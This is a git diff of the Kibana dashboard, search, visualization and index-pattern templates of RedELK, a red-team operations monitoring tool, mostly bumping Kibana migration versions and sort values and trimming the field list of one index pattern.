"41f94ad0-d04c-11ea-9301-a30a04251ae9", + "name": "55aca97f-b1f0-43b1-af44-756fe59be5fc:panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", + "type": "visualization" + }, { "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "9a987436-c698-4236-9b92-bfab81de8cc1:panel_9a987436-c698-4236-9b92-bfab81de8cc1", @@ -1779,8 +1782,8 @@ } ], "sort": [ - 1642152857910, - 2115 + 1643016103992, + 297 ], "type": "dashboard", "version": "1" @@ -1891,7 +1894,7 @@ "title": "RedELK - Credentials dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "82b865a0-d318-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -1924,8 +1927,8 @@ } ], "sort": [ - 1642152857910, - 2121 + 1642171876916, + 85 ], "type": "dashboard", "version": "1" @@ -2035,7 +2038,7 @@ "title": "RedELK - IOC dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "86643e90-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -2068,8 +2071,8 @@ } ], "sort": [ - 1642152857910, - 2127 + 1642171876916, + 91 ], "type": "dashboard", "version": "1" @@ -2180,7 +2183,7 @@ "title": "RedELK - Screenshots dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "a2dcebf0-d316-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -2213,8 +2216,8 @@ } ], "sort": [ - 1642152857910, - 2133 + 1642171876916, + 97 ], "type": "dashboard", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_.siem-signals.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_.siem-signals.json index d176cab9..dc33d315 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_.siem-signals.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_.siem-signals.json @@ -8669,15 +8669,15 @@ "timeFieldName": "@timestamp", "title": ".siem-signals-*" }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642152853649, - 1942 + 1642171872765, + 241 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_bluecheck.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_bluecheck.json index a1107ee2..4719cde1 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_bluecheck.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_bluecheck.json @@ -1,617 +1,22 @@ [ { "attributes": { - "fieldFormatMap": "{\"implant.log_file\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}}}", - "fields": [ - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "@timestamp", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "@version", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "@version.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "@version" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_id" - ], - "name": "_id", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_index" - ], - "name": "_index", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "name": "_score", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "number" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "_source" - ], - "name": "_source", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "_source" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_type" - ], - "name": "_type", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "bluechecktimestamp", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "bluechecktimestamp.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "bluechecktimestamp" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "text", - "keyword" - ], - "name": "bluechecktype", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "bluechecktype.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "bluechecktype" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "text", - "keyword" - ], - "name": "classifier", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "classifier.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "classifier" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "text", - "keyword" - ], - "name": "domain", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "domain.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "domain" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "ecs.version", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "ecs.version.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "ecs.version" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "event.type", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.type.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "event.type" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "implant.id", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "implant.id.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "implant.id" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "implant.log_file", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "implant.log_file.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "implant.log_file" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "infra.attack_scenario", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "infra.attack_scenario.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "infra.attack_scenario" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "message", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "message.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "message" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "text", - "keyword" - ], - "name": "path", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "path.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "path" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "pstools.psx.edr_name", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "pstools.psx.edr_name.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "pstools.psx.edr_name" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "pstools.psx.security_products", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "pstools.psx.security_products.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "pstools.psx.security_products" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "pstools.tool", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "pstools.tool.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "pstools.tool" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "results", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "results.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "results" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "tags", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tags.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "tags" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "text", - "keyword" - ], - "name": "type", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "type.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "type" - } - }, - "type": "string" - } - ], + "fieldAttrs": "{\"bluecheck.sectools.Product\":{\"count\":1},\"bluechecktype\":{\"count\":1}}", + "fields": [], + "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", - "title": "bluecheck-*" + "title": "bluecheck-*", + "typeMeta": "{}" }, - "coreMigrationVersion": "7.16.2", - "id": "bluecheck", + "coreMigrationVersion": "7.16.3", + "id": "972368b0-7b90-11ec-9471-7f985bde469d", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642152837408, - 1663 + 1644504089054, + 308 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_credentials.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_credentials.json index ff38d6f3..31b65195 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_credentials.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_credentials.json @@ -870,15 +870,15 @@ "timeFieldName": "@timestamp", "title": "credentials-*" }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "credentials", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642152839362, - 1858 + 1642171858664, + 19 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_email.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_email.json index 8e667549..c715ea9e 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_email.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_email.json @@ -2826,15 +2826,15 @@ "timeFieldName": "@timestamp", "title": "email-*" }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "email", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642152841336, - 1866 + 1642171860673, + 15 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_implantsdb.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_implantsdb.json index ce84b5d6..b8741e1c 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_implantsdb.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_implantsdb.json @@ -1879,15 +1879,15 @@ ], "title": "implantsdb" }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "implantsdb", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642152843417, - 1817 + 1642171862691, + 16 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redelk.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redelk.json index fa3cbb31..361fd12c 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redelk.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redelk.json @@ -206,15 +206,15 @@ ], "title": "redelk-*" }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642152847512, - 1890 + 1642171866710, + 20 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redirtraffic.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redirtraffic.json index 57cd28d5..8cdcaafd 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redirtraffic.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redirtraffic.json @@ -9,15 +9,15 @@ "title": "redirtraffic-*", "typeMeta": "{}" }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "redirtraffic", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642154954544, - 16181 + 1642171868723, + 243 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_rtops.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_rtops.json index 2295571b..0386f52d 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_rtops.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_rtops.json @@ -9,15 +9,15 @@ "title": "rtops-*", "typeMeta": "{}" }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "rtops", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642157817846, - 34863 + 1642171870762, + 242 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_search.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_search.json index 44f05722..31cf5e1f 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_search.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_search.json @@ -33,7 +33,7 @@ "title": "RedELK - _Redirector Traffic", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "search": "7.9.3" @@ -46,8 +46,8 @@ } ], "sort": [ - 1642152855820, - 2152 + 1642171874859, + 198 ], "type": "search", "version": "1" @@ -112,7 +112,7 @@ "title": "RedELK - C2 IOCs - Alarmed", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": { "search": "7.9.3" @@ -130,8 +130,8 @@ } ], "sort": [ - 1642152855820, - 2155 + 1642171874859, + 201 ], "type": "search", "version": "1" @@ -294,7 +294,7 @@ "title": "RedELK - _Red Team Operations", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "migrationVersion": { "search": "7.9.3" @@ -337,8 +337,8 @@ } ], "sort": [ - 1642152855820, - 2163 + 1642171874859, + 209 ], "type": "search", "version": "1" @@ -403,7 +403,7 @@ "title": "RedELK - C2 Downloads", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "migrationVersion": { "search": "7.9.3" @@ -421,8 +421,8 @@ } ], "sort": [ - 1642152855820, - 2166 + 1642171874859, + 212 ], "type": "search", "version": "1" @@ -484,7 +484,7 @@ "title": "RedELK - C2 Keystrokes", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "3afbdbc0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": { "search": "7.9.3" @@ -502,8 +502,8 @@ } ], "sort": [ - 1642152855820, - 2169 + 1642171874859, + 215 ], "type": "search", "version": "1" @@ -540,7 +540,7 @@ "title": "RedELK - C2 Credentials", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "3fabe620-6c38-11ea-97d6-55783aed877a", "migrationVersion": { "search": "7.9.3" @@ -553,8 +553,8 @@ } ], "sort": [ - 1642152855820, - 2171 + 1642171874859, + 217 ], "type": "search", "version": "1" @@ -619,7 +619,7 @@ "title": "RedELK - C2 IOCs", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": { "search": "7.9.3" @@ -637,8 +637,8 @@ } ], "sort": [ - 1642152855820, - 2174 + 1642171874859, + 220 ], "type": "search", "version": "1" @@ -689,7 +689,7 @@ "title": "RedELK - Modules status", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "654f76a0-9269-11eb-a753-9da683898c26", "migrationVersion": { "search": "7.9.3" @@ -707,8 +707,8 @@ } ], "sort": [ - 1642152855820, - 2177 + 1642171874859, + 223 ], "type": "search", "version": "1" @@ -747,7 +747,7 @@ "title": "RedELK - Redirector Traffic - Alarmed", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": { "search": "7.9.3" @@ -760,8 +760,8 @@ } ], "sort": [ - 1642152855820, - 2179 + 1642171874859, + 225 ], "type": "search", "version": "1" @@ -806,7 +806,7 @@ "title": "RedELK - C2 implants overview", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": { "search": "7.9.3" @@ -819,8 +819,8 @@ } ], "sort": [ - 1642152855820, - 2181 + 1642171874859, + 227 ], "type": "search", "version": "1" @@ -850,7 +850,7 @@ "title": "RedELK - IP Lists", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "87530b40-9269-11eb-a753-9da683898c26", "migrationVersion": { "search": "7.9.3" @@ -863,8 +863,8 @@ } ], "sort": [ - 1642152855820, - 2183 + 1642171874859, + 229 ], "type": "search", "version": "1" @@ -898,7 +898,7 @@ "title": "RedELK - BlueCheck", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "a4757c90-ce50-11ea-a580-918d4757c08d", "migrationVersion": { "search": "7.9.3" @@ -911,8 +911,8 @@ } ], "sort": [ - 1642152855820, - 2185 + 1643015939090, + 281 ], "type": "search", "version": "1" @@ -944,7 +944,7 @@ "title": "RedELK - Emails", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "c1fca0d0-d171-11ea-8ac3-bfcfabda2250", "migrationVersion": { "search": "7.9.3" @@ -957,8 +957,8 @@ } ], "sort": [ - 1642152855820, - 2187 + 1642171874859, + 231 ], "type": "search", "version": "1" @@ -1011,7 +1011,7 @@ "title": "RedELK - C2 Tasks", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "cc523820-d021-11ea-9301-a30a04251ae9", "migrationVersion": { "search": "7.9.3" @@ -1029,8 +1029,8 @@ } ], "sort": [ - 1642152855820, - 2190 + 1642171874859, + 234 ], "type": "search", "version": "1" @@ -1083,7 +1083,7 @@ "title": "RedELK - Signals", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "migrationVersion": { "search": "7.9.3" @@ -1101,8 +1101,8 @@ } ], "sort": [ - 1642152855820, - 2193 + 1642171874859, + 237 ], "type": "search", "version": "1" @@ -1161,7 +1161,7 @@ "title": "RedELK - C2 Screenshots", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": { "search": "7.9.3" @@ -1179,8 +1179,8 @@ } ], "sort": [ - 1642152855820, - 2196 + 1642171874859, + 240 ], "type": "search", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_visualization.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_visualization.json index 14d2756d..7b198e16 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_visualization.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_visualization.json @@ -149,7 +149,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -162,8 +162,8 @@ } ], "sort": [ - 1642152856829, - 2209 + 1642171875895, + 99 ], "type": "visualization", "version": "1" @@ -303,7 +303,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -316,8 +316,8 @@ } ], "sort": [ - 1642152856829, - 2211 + 1642171875895, + 101 ], "type": "visualization", "version": "1" @@ -348,15 +348,15 @@ "type": "markdown" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "0f82b540-d237-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" }, "references": [], "sort": [ - 1642152856829, - 2212 + 1642171875895, + 102 ], "type": "visualization", "version": "1" @@ -467,7 +467,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -485,8 +485,8 @@ } ], "sort": [ - 1642152856829, - 2215 + 1642171875895, + 105 ], "type": "visualization", "version": "1" @@ -577,7 +577,7 @@ "type": "tile_map" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "10dd40f0-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -590,8 +590,8 @@ } ], "sort": [ - 1642152856829, - 2217 + 1642171875895, + 107 ], "type": "visualization", "version": "1" @@ -682,7 +682,7 @@ "type": "tile_map" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "1d26da60-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -695,8 +695,8 @@ } ], "sort": [ - 1642152856829, - 2219 + 1642171875895, + 109 ], "type": "visualization", "version": "1" @@ -777,7 +777,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "20fac240-926c-11eb-a753-9da683898c26", "migrationVersion": { "visualization": "7.14.0" @@ -790,8 +790,8 @@ } ], "sort": [ - 1642152856829, - 2221 + 1642171875895, + 111 ], "type": "visualization", "version": "1" @@ -945,7 +945,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "231792d0-d050-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -958,8 +958,8 @@ } ], "sort": [ - 1642152856829, - 2223 + 1642171875895, + 113 ], "type": "visualization", "version": "1" @@ -1113,7 +1113,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1126,8 +1126,8 @@ } ], "sort": [ - 1642152856829, - 2225 + 1642171875895, + 115 ], "type": "visualization", "version": "1" @@ -1212,7 +1212,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "2f77a150-926a-11eb-a753-9da683898c26", "migrationVersion": { "visualization": "7.14.0" @@ -1225,8 +1225,8 @@ } ], "sort": [ - 1642152856829, - 2227 + 1642171875895, + 117 ], "type": "visualization", "version": "1" @@ -1314,7 +1314,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "2f971ac0-926b-11eb-a753-9da683898c26", "migrationVersion": { "visualization": "7.14.0" @@ -1327,8 +1327,8 @@ } ], "sort": [ - 1642152856829, - 2229 + 1642171875895, + 119 ], "type": "visualization", "version": "1" @@ -1393,7 +1393,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1406,8 +1406,8 @@ } ], "sort": [ - 1642152856829, - 2231 + 1642171875895, + 121 ], "type": "visualization", "version": "1" @@ -1472,7 +1472,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "389dddc0-d317-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1485,8 +1485,8 @@ } ], "sort": [ - 1642152856829, - 2233 + 1642171875895, + 123 ], "type": "visualization", "version": "1" @@ -1626,7 +1626,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1639,8 +1639,8 @@ } ], "sort": [ - 1642152856829, - 2235 + 1642171875895, + 125 ], "type": "visualization", "version": "1" @@ -1703,7 +1703,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1716,8 +1716,8 @@ } ], "sort": [ - 1642152856829, - 2237 + 1642171875895, + 127 ], "type": "visualization", "version": "1" @@ -1748,15 +1748,15 @@ "type": "markdown" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "45491770-0886-11eb-a2d2-171dc8941414", "migrationVersion": { "visualization": "7.14.0" }, "references": [], "sort": [ - 1642152856829, - 2238 + 1642171875895, + 128 ], "type": "visualization", "version": "1" @@ -1822,7 +1822,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": 